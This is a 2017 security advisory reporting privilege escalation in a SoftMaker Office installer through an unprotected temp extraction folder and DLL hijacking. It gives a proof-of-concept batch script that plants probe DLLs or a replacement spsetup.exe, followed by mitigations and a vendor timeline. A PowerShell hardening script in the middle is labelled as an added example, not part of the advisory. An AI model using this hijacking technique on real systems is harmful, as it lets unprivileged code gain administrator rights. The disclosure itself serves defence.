SoftMaker Office 201x Privilege Escalation
Posted on 04 January 2017
Hi @ll,

the service pack installers for SoftMaker Office 201x, available from <http://www.softmaker.com/en/servicepacks-office-windows>, are (surprise.-) vulnerable.

The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx" to extract its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".

"%TEMP%\7zSxxxxxxxx" inherits the NTFS access rights of its parent "%TEMP%", i.e. it allows full access for the UNPRIVILEGED user. For this well-known vulnerability see <https://cwe.mitre.org/data/definitions/377.html> and <https://cwe.mitre.org/data/definitions/379.html>

Due to the embedded application manifest, which specifies "requireAdministrator", the executable installer can only be run with administrative rights.

JFTR: if written properly, it would create a PROTECTED directory "%TEMP%\7zSxxxxxxxx", writable only for privileged users!

The UNPRIVILEGED user, as well as any program running with the user's credentials, can modify the extracted files, for example "%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with administrative rights, resulting in arbitrary code execution with elevation of privilege.

Additionally "spsetup.exe" is vulnerable to DLL hijacking, another well-known vulnerability. See <https://capec.mitre.org/data/definitions/471.html>, <https://cwe.mitre.org/data/definitions/426.html>, <https://cwe.mitre.org/data/definitions/427.html>, <https://technet.microsoft.com/en-us/library/2269637.aspx>, <https://msdn.microsoft.com/en-us/library/ff919712.aspx> and <https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus <http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>

Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx" the unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx" which are loaded by "spsetup.exe", again resulting in arbitrary code execution with elevation of privilege!

Proof-of-concept:
~~~~~~~~~~~~~~~~~

0. download <http://www.softmaker.net/down/ofw16_763.exe> and save it in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html> alias <https://skanthak.homepage.t-online.de/sentinel.html>) and save it in an(other) arbitrary directory;

2. save the following batch script in the same directory as SENTINEL.DLL:

--- OFW16_873.CMD ---
:WAIT
REM poll until the installer has created its "%TEMP%\7z*" extraction directory
@If Not Exist "%TEMP%\7z*" Goto :WAIT
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!
REM place the probe DLL under the names "spsetup.exe" loads from its own directory
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"
--- EOF ---

3. start the batch script;

4. execute ofw16_873.exe and notice the message boxes displayed by SENTINEL.DLL.
   PWNED!

5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE> to the same directory as the batch script;

6. in the batch script replace the 3 lines "Copy ..." with
   Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"

7. start the batch script;

8. execute ofw16_873.exe and notice the message box displayed by SENTINEL.EXE.
   PWNED!

Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER! Don't use self-extractors! NEVER! See <http://seclists.org/fulldisclosure/2015/Nov/101> and <http://seclists.org/fulldisclosure/2015/Dec/86> plus <http://home.arcor.de/skanthak/!execute.html> alias <https://skanthak.homepage.t-online.de/!execute.html> for more information.

* Practice STRICT privilege separation: NEVER use the so-called "protected" administrator account(s) created during Windows setup, which use the same "%TEMP%" for unprivileged and privileged processes!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to decode it to "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories".
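The last mitigation, as a small PowerShell script that decodes the SDDL ACE into a .NET access rule, audits whether "%USERPROFILE%" already carries it and adds it on request. This is an added example, not code from the advisory or from SoftMaker; it assumes Windows PowerShell 5.1 or later, and the parameter names -Path and -Apply are chosen here.

```powershell
# Added example (not from the advisory): audit %USERPROFILE% for the ACE
# "(D;OIIO;WP;;;WD)" recommended above and add it on request. SDDL decoded:
#   D  = ACCESS_DENIED_ACE_TYPE
#   OI = OBJECT_INHERIT_ACE, IO = INHERIT_ONLY_ACE: the entry applies to the
#        files below this directory (at every depth), not to the directory itself
#   WP = on file objects the generic SDDL token WP is FILE_EXECUTE (0x20)
#   WD = Everyone (S-1-1-0)
# -Path and -Apply are this example's own parameter names (assumption).
param(
    [string]$Path = $env:USERPROFILE,
    [switch]$Apply    # without -Apply the script only audits
)

$everyone = [System.Security.Principal.SecurityIdentifier]::new('S-1-1-0')
$execute  = [System.Security.AccessControl.FileSystemRights]::ExecuteFile

# The same ACE expressed as a .NET access rule instead of raw SDDL
$rule = [System.Security.AccessControl.FileSystemAccessRule]::new(
    $everyone,
    $execute,
    [System.Security.AccessControl.InheritanceFlags]::ObjectInherit,
    [System.Security.AccessControl.PropagationFlags]::InheritOnly,
    [System.Security.AccessControl.AccessControlType]::Deny)

$acl = Get-Acl -Path $Path

# Audit: is an equivalent deny-execute entry for Everyone already in the DACL?
$present = $acl.Access | Where-Object {
    $_.AccessControlType -eq 'Deny' -and
    $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) -eq $everyone -and
    (($_.FileSystemRights -band $execute) -ne 0) -and
    $_.InheritanceFlags -eq 'ObjectInherit' -and
    $_.PropagationFlags -eq 'InheritOnly'
}

if ($present) {
    Write-Output "OK: deny-execute ACE for Everyone already present on $Path"
}
elseif ($Apply) {
    $acl.AddAccessRule($rule)
    Set-Acl -Path $Path -AclObject $acl
    # Show the resulting DACL in SDDL form; the new entry should appear as (D;OIIO;WP;;;WD)
    Write-Output (Get-Acl -Path $Path).Sddl
}
else {
    Write-Output "MISSING: no deny-execute ACE for Everyone on $Path (re-run with -Apply)"
}
```

Run it as the user whose profile is being hardened (the profile owner can write its DACL). Because the entry inherits to every file below the profile, per-user installs living under "%LOCALAPPDATA%" will no longer execute until they are moved or given an explicit allow entry.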
stay tuned
Stefan Kanthak

Timeline:
~~~~~~~~~

2016-12-15    sent vulnerability report to vendor
              no reply, not even an acknowledgement of receipt

2016-12-23    resent vulnerability report to vendor, cc CERT at German BSI
              no reply, not even an acknowledgement of receipt

2016-12-27    CERT at German BSI contacts vendor offering help
              no reply, not even an acknowledgement of receipt

2016-12-31    report published